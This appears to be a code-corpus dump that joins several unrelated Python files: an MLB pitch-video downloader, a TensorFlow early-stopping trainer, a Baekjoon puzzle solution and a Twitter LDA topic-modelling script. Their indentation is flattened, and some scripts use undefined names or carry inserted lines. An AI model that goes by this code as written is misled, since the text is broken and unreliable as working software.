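# get_video_url above picks the highest-bitrate CENTERFIELD rendition.
def _demo_get_video_url():
    fake_pitch = {
        "isPickoff": False,
        "isPitch": True,
        "video": {"playbackGroups": [{
            "mediaSourceType": "CENTERFIELD",
            "playbackRenditions": [
                {"bitrate": "2500K", "playbackUrl": "https://example.invalid/low.mp4"},
                {"bitrate": "4000K", "playbackUrl": "https://example.invalid/high.mp4"},
            ],
        }]},
    }
    return get_video_url(fake_pitch)   # expected: the 4000K playbackUrl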
def build_dict(seq, key):
return dict((d[key], dict(d, index=index)) for (index, d) in enumerate(seq))
def json_data(guid):
for j in json_files:
with open(j, 'r') as myfile:
data=myfile.read()
if guid in data:
# print(j)
obj = json.loads(data)
# print("got obj")
return obj
# else:
print("Cannot find GUID, please enter GUID from a JSON file in current dir")
return
def clear_images():
folder = './images/'
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
def main():
args = parser.parse_args()
guid = args.guid
# search in json files for the guid
obj = json_data(guid)
if obj is not None:
info = build_dict(obj, key="guid")
# pickoff attempt example
# pitch_dict = info.get("09812143-51f6-4dd9-9789-d72c53354980")
pitch_dict = info.get(guid)
        url = get_video_url(pitch_dict)
        # guard before using the URL: get_video_url can return None or the string "Pickoff"
        if url is not None and url != "Pickoff":
            vid = url.split('https://sporty-clips.mlb.com/')[1]
            vid_img = vid.split("-")[0]
# delete old videos
for item in os.listdir("."):
if item.endswith(".mp4"):
os.remove(item)
download_video(url)
print("removing old images...")
clear_images()
subprocess.call(['ffmpeg','-i', vid, "-q:v","1",'images/{}_%04d.jpg'.format(vid_img,"")])
else: print("no url found")
if __name__ == '__main__':
main()
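# Added usage note (illustration): the script is driven from the command line, e.g.
#   python utils.py --guid <guid taken from one of the local JSON files>
# which downloads the matching centerfield clip into the current directory, clears
# ./images/, and writes one JPEG per frame there via ffmpeg.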
# ret = subprocess.call(['ffmpeg','-i', video_src, '-c' , 'copy', '-t', clip_duration,
# '-vcodec', 'libx264', '{}/{}_{}.mp4'.format(event_type,os.path.splitext(video_src)[0],"{:02d}".format(clip_num))])
# if ret > 0:
# raise Exception('ffmpeg could not split the video to clips')
# print('Beginning file download... {}'.format(url))
# urllib.request.urlretrieve("{}".format(url), headers={'User-Agent': 'Mozilla/5.0'})
# data = urllib.request.urlretrieve("{}".format(url))
# req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# urllib.request.urlretrieve(link, 'video_name.mp4')
# urllib.request.urlretrieve(link)
# # print the keys and values
# for key in obj:
# # loop through each entry in the json file, which is a recorded pitch (key is a pitch)
# # get the video list from each pitch which is called playbackGroup, returns list
# vid_playback = key['video']['playbackGroups']
# for i in range(len(vid_playback)):
# # iterate through list and get centerfield playbackrenditions
# # extract centerfield camera and max bitrate
# if vid_playback[i]['mediaSourceType'] == "CENTERFIELD":
# max_bit = 0
# max_bit_index = None
# cf = vid_playback[i]
# for iter, j in enumerate(cf['playbackRenditions']):
# # print(iter)
# # print(j)
# bitrate = int(j['bitrate'].strip("K"))
# if bitrate > max_bit:
# max_bit = bitrate
# max_bit_index = iter
# # print(max_bit_index)
# print(cf['playbackRenditions'][max_bit_index]['playbackUrl']) | import os
import json
import urllib.request
import subprocess
import argparse
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--guid', help='guid from json of video')
json_files = [pos_json for pos_json in os.listdir('.') if pos_json.endswith('.json')]
def download_video(url):
try:
ret1 = subprocess.call(['wget',"-P", "./",url,])
if ret1 > 0:
raise Exception('could not wget')
except Exception as e:
print (str(e))
raise e
def get_video_url(pitch_dict):
# check to see that the data pertains to a pitch and not a pickoff
if (pitch_dict['isPickoff'] and not pitch_dict['isPitch']):
print("Not pitch, pick off")
return "Pickoff"
# subset info on playback types to iterate through
video_playbacks = pitch_dict['video']['playbackGroups']
# loop through playback types looking for centrefield camera
for i in range(len(video_playbacks)):
if video_playbacks[i]['mediaSourceType'] == "CENTERFIELD":
max_bit = 0
max_bit_index = None
# create subset of playback data pertaining to current data
cf = video_playbacks[i]
for iter, j in enumerate(cf['playbackRenditions']):
# if bitrate is higher than current max bitrate, pick
bitrate = int(j['bitrate'].strip("K"))
if bitrate > max_bit:
max_bit = bitrate
max_bit_index = iter
# print(max_bit_index)
video_url = cf['playbackRenditions'][max_bit_index]['playbackUrl']
return video_url
def build_dict(seq, key):
return dict((d[key], dict(d, index=index)) for (index, d) in enumerate(seq))
def json_data(guid):
for j in json_files:
with open(j, 'r') as myfile:
data=myfile.read()
if guid in data:
# print(j)
obj = json.loads(data)
# print("got obj")
return obj
# else:
print("Cannot find GUID, please enter GUID from a JSON file in current dir")
return
def clear_images():
folder = './images/'
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
def main():
args = parser.parse_args()
guid = args.guid
# search in json files for the guid
obj = json_data(guid)
if obj is not None:
info = build_dict(obj, key="guid")
# pickoff attempt example
# pitch_dict = info.get("09812143-51f6-4dd9-9789-d72c53354980")
pitch_dict = info.get(guid)
url = get_video_url(pitch_dict)
vid = url.split('https://sporty-clips.mlb.com/')[1]
vid_img = vid.split("-")[0]
if url is not None:
# delete old videos
for item in os.listdir("."):
if item.endswith(".mp4"):
os.remove(item)
download_video(url)
print("removing old images...")
clear_images()
subprocess.call(['ffmpeg','-i', vid, "-q:v","1",'images/{}_%04d.jpg'.format(vid_img,"")])
else: print("no url found")
if __name__ == '__main__':
main()
# ret = subprocess.call(['ffmpeg','-i', video_src, '-c' , 'copy', '-t', clip_duration,
# '-vcodec', 'libx264', '{}/{}_{}.mp4'.format(event_type,os.path.splitext(video_src)[0],"{:02d}".format(clip_num))])
# if ret > 0:
# raise Exception('ffmpeg could not split the video to clips')
# print('Beginning file download... {}'.format(url))
# urllib.request.urlretrieve("{}".format(url), headers={'User-Agent': 'Mozilla/5.0'})
# data = urllib.request.urlretrieve("{}".format(url))
# req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# urllib.request.urlretrieve(link, 'video_name.mp4')
# urllib.request.urlretrieve(link)
# # print the keys and values
# for key in obj:
# # loop through each entry in the json file, which is a recorded pitch (key is a pitch)
# # get the video list from each pitch which is called playbackGroup, returns list
# vid_playback = key['video']['playbackGroups']
# for i in range(len(vid_playback)):
# # iterate through list and get centerfield playbackrenditions
# # extract centerfield camera and max bitrate
# if vid_playback[i]['mediaSourceType'] == "CENTERFIELD":
# max_bit = 0
# max_bit_index = None
# cf = vid_playback[i]
# for iter, j in enumerate(cf['playbackRenditions']):
# # print(iter)
# # print(j)
# bitrate = int(j['bitrate'].strip("K"))
# if bitrate > max_bit:
# max_bit = bitrate
# max_bit_index = iter
# # print(max_bit_index)
# print(cf['playbackRenditions'][max_bit_index]['playbackUrl']) | en | 0.617637 | # check to see that the data pertains to a pitch and not a pickoff # subset info on playback types to iterate through # loop through playback types looking for centrefield camera # create subset of playback data pertaining to current data # if bitrate is higher than current max bitrate, pick # print(max_bit_index) # print(j) # print("got obj") # else: # search in json files for the guid # pickoff attempt example # pitch_dict = info.get("09812143-51f6-4dd9-9789-d72c53354980") # delete old videos # ret = subprocess.call(['ffmpeg','-i', video_src, '-c' , 'copy', '-t', clip_duration, # '-vcodec', 'libx264', '{}/{}_{}.mp4'.format(event_type,os.path.splitext(video_src)[0],"{:02d}".format(clip_num))]) # if ret > 0: # raise Exception('ffmpeg could not split the video to clips') # print('Beginning file download... {}'.format(url)) # urllib.request.urlretrieve("{}".format(url), headers={'User-Agent': 'Mozilla/5.0'}) # data = urllib.request.urlretrieve("{}".format(url)) # req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) # webpage = urlopen(req).read() # urllib.request.urlretrieve(link, 'video_name.mp4') # urllib.request.urlretrieve(link) # # print the keys and values # for key in obj: # # loop through each entry in the json file, which is a recorded pitch (key is a pitch) # # get the video list from each pitch which is called playbackGroup, returns list # vid_playback = key['video']['playbackGroups'] # for i in range(len(vid_playback)): # # iterate through list and get centerfield playbackrenditions # # extract centerfield camera and max bitrate # if vid_playback[i]['mediaSourceType'] == "CENTERFIELD": # max_bit = 0 # max_bit_index = None # cf = vid_playback[i] # for iter, j in enumerate(cf['playbackRenditions']): # # print(iter) # # print(j) # bitrate = int(j['bitrate'].strip("K")) # if bitrate > max_bit: # max_bit = bitrate # max_bit_index = iter # # print(max_bit_index) # print(cf['playbackRenditions'][max_bit_index]['playbackUrl']) | 2.749222 | 3 |
strategies/cdnnc.py | aladics/DeepBugHunter | 6 | 6632537 | <filename>strategies/cdnnc.py
import os
import shutil
import math
import logging
import argparse
import tensorflow as tf
from tensorflow.python.platform import tf_logging
import dbh_util as util
import classifier as cl
import pandas2tf
EPS = 1e-8
CLASSES = 2
def log(msg):
tf_logging.log(tf_logging.FATAL, msg) # FATAL to show up at any TF logging level
logging.getLogger('DeepBugHunter').info(msg)
#
# Strategy args
#
parser = argparse.ArgumentParser()
parser.add_argument('--layers', type=int, help='Number of layers')
parser.add_argument('--neurons', type=int, help='Number of neurons per layer')
parser.add_argument('--batch', type=int, help='Batch size')
parser.add_argument('--lr', type=float, help='Starting learning rate')
parser.add_argument('--beta', type=float, default=0.0, help='L2 regularization bias')
parser.add_argument('--max-misses', type=int, default=4, help='Maximum consecutive misses before early stopping')
parser.add_argument('--sandbox', default=os.path.abspath('sandbox'), help='Intermediary model folder')
#
# Validate after every epoch, and if the model gets worse, then restore the previous best model and try again
# with a reduced (halved) learning rate
#
def predict(classifier, test, args, sargs_str):
sargs = util.parse(parser, sargs_str.split())
preds = classifier.predict(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return [pred['class_ids'] for pred in preds]
def learn(train, dev, test, args, sargs_str):
# Read strategy-specific args
sargs = util.parse(parser, sargs_str.split())
# Clean out the sandbox
util.mkdir(sargs['sandbox'], clean=True)
# Feature columns describe how to use the input
my_feature_columns = []
for key in train[0].keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
# Calculate epoch length
steps_per_epoch = math.ceil(len(train[0]) / sargs['batch'])
# Train a classifier
# Repeat until the model consecutively "misses" a set number of times
rounds = 1
misses = miss_streak = 0
best_result = {'fmes': -1}
best_model_dir = None
best_classifier = None
while miss_streak < sargs['max_misses']:
model_dir = os.path.join(sargs['sandbox'], 'run_' + str(rounds) + '_' + str(miss_streak))
extra_args = {
'classes': CLASSES,
'columns': my_feature_columns,
'steps_per_epoch': steps_per_epoch,
'learning_rate': sargs['lr'] / (2 ** misses),
'model_dir': model_dir,
'warm_start_dir': best_model_dir
}
merged_args = {**args, **sargs, **extra_args}
# Create a new classifier instance
classifier = cl.create_classifier(merged_args)
# Train the model for exactly 1 epoch
classifier.train(
input_fn=lambda:pandas2tf.train_input_fn(train, sargs['batch']),
steps=steps_per_epoch)
# Evaluate the model
eval_result = classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
log('Round ' + str(rounds) + '_' + str(miss_streak) + ', Fmes: ' + str(best_result['fmes']) + ' --> ' + str(eval_result['fmes']))
if eval_result['fmes'] > best_result['fmes']:
best_result = eval_result
best_model_dir = model_dir
best_classifier = classifier
miss_streak = 0
rounds += 1
log('Improvement, go on...')
else:
miss_streak += 1
misses += 1
log('Miss #' + str(misses) + ', (streak = ' + str(miss_streak) + ')')
# Cleanup sandbox not to run out of space due to models
for m_dir in os.listdir(sargs['sandbox']):
abs_m_dir = os.path.join(sargs['sandbox'], m_dir)
if best_model_dir != abs_m_dir and model_dir != abs_m_dir:
tf.summary.FileWriterCache.clear()
shutil.rmtree(abs_m_dir)
final_result_train = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(train, sargs['batch']))
final_result_dev = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
final_result_test = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return final_result_train, final_result_dev, final_result_test, best_classifier
| <filename>strategies/cdnnc.py
import os
import shutil
import math
import logging
import argparse
import tensorflow as tf
from tensorflow.python.platform import tf_logging
import dbh_util as util
import classifier as cl
import pandas2tf
EPS = 1e-8
CLASSES = 2
def log(msg):
tf_logging.log(tf_logging.FATAL, msg) # FATAL to show up at any TF logging level
logging.getLogger('DeepBugHunter').info(msg)
#
# Strategy args
#
parser = argparse.ArgumentParser()
parser.add_argument('--layers', type=int, help='Number of layers')
parser.add_argument('--neurons', type=int, help='Number of neurons per layer')
parser.add_argument('--batch', type=int, help='Batch size')
parser.add_argument('--lr', type=float, help='Starting learning rate')
parser.add_argument('--beta', type=float, default=0.0, help='L2 regularization bias')
parser.add_argument('--max-misses', type=int, default=4, help='Maximum consecutive misses before early stopping')
parser.add_argument('--sandbox', default=os.path.abspath('sandbox'), help='Intermediary model folder')
#
# Validate after every epoch, and if the model gets worse, then restore the previous best model and try again
# with a reduced (halved) learning rate
#
def predict(classifier, test, args, sargs_str):
sargs = util.parse(parser, sargs_str.split())
preds = classifier.predict(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return [pred['class_ids'] for pred in preds]
def learn(train, dev, test, args, sargs_str):
# Read strategy-specific args
sargs = util.parse(parser, sargs_str.split())
# Clean out the sandbox
util.mkdir(sargs['sandbox'], clean=True)
# Feature columns describe how to use the input
my_feature_columns = []
for key in train[0].keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
# Calculate epoch length
steps_per_epoch = math.ceil(len(train[0]) / sargs['batch'])
# Train a classifier
# Repeat until the model consecutively "misses" a set number of times
rounds = 1
misses = miss_streak = 0
best_result = {'fmes': -1}
best_model_dir = None
best_classifier = None
while miss_streak < sargs['max_misses']:
model_dir = os.path.join(sargs['sandbox'], 'run_' + str(rounds) + '_' + str(miss_streak))
extra_args = {
'classes': CLASSES,
'columns': my_feature_columns,
'steps_per_epoch': steps_per_epoch,
'learning_rate': sargs['lr'] / (2 ** misses),
'model_dir': model_dir,
'warm_start_dir': best_model_dir
}
merged_args = {**args, **sargs, **extra_args}
# Create a new classifier instance
classifier = cl.create_classifier(merged_args)
# Train the model for exactly 1 epoch
classifier.train(
input_fn=lambda:pandas2tf.train_input_fn(train, sargs['batch']),
steps=steps_per_epoch)
# Evaluate the model
eval_result = classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
log('Round ' + str(rounds) + '_' + str(miss_streak) + ', Fmes: ' + str(best_result['fmes']) + ' --> ' + str(eval_result['fmes']))
if eval_result['fmes'] > best_result['fmes']:
best_result = eval_result
best_model_dir = model_dir
best_classifier = classifier
miss_streak = 0
rounds += 1
log('Improvement, go on...')
else:
miss_streak += 1
misses += 1
log('Miss #' + str(misses) + ', (streak = ' + str(miss_streak) + ')')
# Cleanup sandbox not to run out of space due to models
for m_dir in os.listdir(sargs['sandbox']):
abs_m_dir = os.path.join(sargs['sandbox'], m_dir)
if best_model_dir != abs_m_dir and model_dir != abs_m_dir:
tf.summary.FileWriterCache.clear()
shutil.rmtree(abs_m_dir)
final_result_train = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(train, sargs['batch']))
final_result_dev = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
final_result_test = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return final_result_train, final_result_dev, final_result_test, best_classifier
| en | 0.753046 | # FATAL to show up at any TF logging level # # Strategy args # # # Validate after every epoch, and if the model gets worse, then restore the previous best model and try again # with a reduced (halved) learning rate # # Read strategy-specific args # Clean out the sandbox # Feature columns describe how to use the input # Calculate epoch length # Train a classifier # Repeat until the model consecutively "misses" a set number of times # Create a new classifier instance # Train the model for exactly 1 epoch # Evaluate the model #' + str(misses) + ', (streak = ' + str(miss_streak) + ')') # Cleanup sandbox not to run out of space due to models | 2.390537 | 2 |
baekjoon/2775.py | DevStarSJ/algorithmExercise | 0 | 6632538 | <filename>baekjoon/2775.py
def GetNum_timeout(k,n):
if k == 0:
return n
result = 0
for i in range(0,n+1):
result += GetNum(k-1, i)
return result
apt = []
def makeApt(k,n):
apt.append([])
for i in range(n):
apt[0].append(i+1)
for i in range(k-1):
apt.append([])
for j in range(n):
res = 0
for k in range(j+1):
res += apt[i][k]
apt[i+1].append(res)
def GetNum(k,n):
result = 0
for i in range(n):
result += apt[k-1][i]
return result
if __name__ == "__main__":
num = int(input())
K, N = [], []
for _ in range(num):
K.append(int(input()))
N.append(int(input()))
makeApt(max(K), max(N))
for i in range(num):
print(GetNum(K[i],N[i]))
# 1호 : 1
# 2호 : 2,3,4,5,6 : k
# 3호 : 3, 6, 10, 15 : n + (n+1) + (n+2) ... kn+ 0~n까지 합
# 4호 : 4, 10, 20, 35 : 6, 10, 15
| <filename>baekjoon/2775.py
def GetNum_timeout(k,n):
if k == 0:
return n
result = 0
for i in range(0,n+1):
result += GetNum(k-1, i)
return result
apt = []
def makeApt(k,n):
apt.append([])
for i in range(n):
apt[0].append(i+1)
for i in range(k-1):
apt.append([])
for j in range(n):
res = 0
for k in range(j+1):
res += apt[i][k]
apt[i+1].append(res)
def GetNum(k,n):
result = 0
for i in range(n):
result += apt[k-1][i]
return result
if __name__ == "__main__":
num = int(input())
K, N = [], []
for _ in range(num):
K.append(int(input()))
N.append(int(input()))
makeApt(max(K), max(N))
for i in range(num):
print(GetNum(K[i],N[i]))
# 1호 : 1
# 2호 : 2,3,4,5,6 : k
# 3호 : 3, 6, 10, 15 : n + (n+1) + (n+2) ... kn+ 0~n까지 합
# 4호 : 4, 10, 20, 35 : 6, 10, 15
| ko | 0.469472 | # 1호 : 1 # 2호 : 2,3,4,5,6 : k # 3호 : 3, 6, 10, 15 : n + (n+1) + (n+2) ... kn+ 0~n까지 합 # 4호 : 4, 10, 20, 35 : 6, 10, 15 | 3.218167 | 3 |
Data Processing/twitter_model_generation.py | reallyrehan/pollytics | 1 | 6632539 | <filename>Data Processing/twitter_model_generation.py
import sys
if 'google.colab' in sys.modules:
!pip install emoji --upgrade
!pip install pandas-profiling==2.*
!pip install plotly==4.*
#!python -m spacy download en_core_web_lg
!pip install pyldavis
!pip install gensim
!pip install chart_studio
!pip install --upgrade autopep8
#Base and Cleaning
import json
import requests
import pandas as pd
import numpy as np
import emoji
import regex
import re
import string
from collections import Counter
#Visualizations
import plotly.express as px
import seaborn as sns
import matplotlib.pyplot as plt
import pyLDAvis.gensim
import chart_studio
import chart_studio.plotly as py
import chart_studio.tools as tls
#Natural Language Processing (NLP)
import spacy
import gensim
from spacy.tokenizer import Tokenizer
from gensim.corpora import Dictionary
from gensim.models.ldamulticore import LdaMulticore
from gensim.models.coherencemodel import CoherenceModel
from gensim.parsing.preprocessing import STOPWORDS as SW
from sklearn.decomposition import LatentDirichletAllocation, TruncatedSVD
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.model_selection import GridSearchCV
from pprint import pprint
from wordcloud import STOPWORDS
from gensim import corpora
import pickle
import gensim
import re
from nltk.corpus import wordnet as wn
import spacy
from nltk.stem.wordnet import WordNetLemmatizer
from spacy.lang.en import English
import random
from datetime import datetime
def tokenize(text):
lda_tokens = []
tokens = parser(text)
for token in tokens:
if token.orth_.isspace():
continue
elif token.like_url:
url_list.append(token)
elif token.orth_.startswith('@'):
user_list.append(token)
else:
lda_tokens.append(token.lower_)
return lda_tokens
def get_lemma(word):
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
def get_lemma2(word):
return WordNetLemmatizer().lemmatize(word)
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def give_emoji_free_text(text):
"""
Removes emoji's from tweets
Accepts:
Text (tweets)
Returns:
Text (emoji free tweets)
"""
emoji_list = [c for c in text if c in emoji.UNICODE_EMOJI]
clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])
return clean_text
def url_free_text(text):
'''
Cleans text from urls
'''
text = re.sub(r'http\S+', '', text)
return text
stopwords = set(STOPWORDS)
nltk.download('wordnet')
nltk.download('stopwords')
en_stop = set(nltk.corpus.stopwords.words('english'))
from spacy.lang.en import English
spacy.load('en')
parser = English()
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in biden_tweets:
if st_date_object<=datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'):
b_tweet.append(bd['Text'])
d_tweet.append(datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'))
biden_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = biden_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
# Instantiating a Base LDA model
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'biden_lda.html')
ldamodel.save('biden_model.gensim')
biden_df=df
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in trump_tweets:
if st_date_object<=datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'):
b_tweet.append(bd['text'])
d_tweet.append(datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'))
trump_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = trump_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'trump_lda.html')
ldamodel.save('trump_model.gensim')
trump_df=df
| <filename>Data Processing/twitter_model_generation.py
import sys
if 'google.colab' in sys.modules:
!pip install emoji --upgrade
!pip install pandas-profiling==2.*
!pip install plotly==4.*
#!python -m spacy download en_core_web_lg
!pip install pyldavis
!pip install gensim
!pip install chart_studio
!pip install --upgrade autopep8
#Base and Cleaning
import json
import requests
import pandas as pd
import numpy as np
import emoji
import regex
import re
import string
from collections import Counter
#Visualizations
import plotly.express as px
import seaborn as sns
import matplotlib.pyplot as plt
import pyLDAvis.gensim
import chart_studio
import chart_studio.plotly as py
import chart_studio.tools as tls
#Natural Language Processing (NLP)
import spacy
import gensim
from spacy.tokenizer import Tokenizer
from gensim.corpora import Dictionary
from gensim.models.ldamulticore import LdaMulticore
from gensim.models.coherencemodel import CoherenceModel
from gensim.parsing.preprocessing import STOPWORDS as SW
from sklearn.decomposition import LatentDirichletAllocation, TruncatedSVD
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.model_selection import GridSearchCV
from pprint import pprint
from wordcloud import STOPWORDS
from gensim import corpora
import pickle
import gensim
import re
from nltk.corpus import wordnet as wn
import spacy
from nltk.stem.wordnet import WordNetLemmatizer
from spacy.lang.en import English
import random
from datetime import datetime
def tokenize(text):
lda_tokens = []
tokens = parser(text)
for token in tokens:
if token.orth_.isspace():
continue
elif token.like_url:
url_list.append(token)
elif token.orth_.startswith('@'):
user_list.append(token)
else:
lda_tokens.append(token.lower_)
return lda_tokens
def get_lemma(word):
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
def get_lemma2(word):
return WordNetLemmatizer().lemmatize(word)
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def give_emoji_free_text(text):
"""
Removes emoji's from tweets
Accepts:
Text (tweets)
Returns:
Text (emoji free tweets)
"""
emoji_list = [c for c in text if c in emoji.UNICODE_EMOJI]
clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])
return clean_text
def url_free_text(text):
'''
Cleans text from urls
'''
text = re.sub(r'http\S+', '', text)
return text
stopwords = set(STOPWORDS)
nltk.download('wordnet')
nltk.download('stopwords')
en_stop = set(nltk.corpus.stopwords.words('english'))
from spacy.lang.en import English
spacy.load('en')
parser = English()
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in biden_tweets:
if st_date_object<=datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'):
b_tweet.append(bd['Text'])
d_tweet.append(datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'))
biden_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = biden_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
# Instantiating a Base LDA model
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'biden_lda.html')
ldamodel.save('biden_model.gensim')
biden_df=df
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in trump_tweets:
if st_date_object<=datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'):
b_tweet.append(bd['text'])
d_tweet.append(datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'))
trump_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = trump_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'trump_lda.html')
ldamodel.save('trump_model.gensim')
trump_df=df
| en | 0.553853 | #!python -m spacy download en_core_web_lg #Base and Cleaning #Visualizations #Natural Language Processing (NLP) Removes emoji's from tweets Accepts: Text (tweets) Returns: Text (emoji free tweets) Cleans text from urls # Makes tokens column # Instantiating a Base LDA model # Getting the topics # Makes tokens column # Getting the topics | 2.386329 | 2 |
Code python/Pycharm/texte_optimisation.py | Thomaw/Rubik-s-cube-solver | 0 | 6632540 | <filename>Code python/Pycharm/texte_optimisation.py
import re
'''
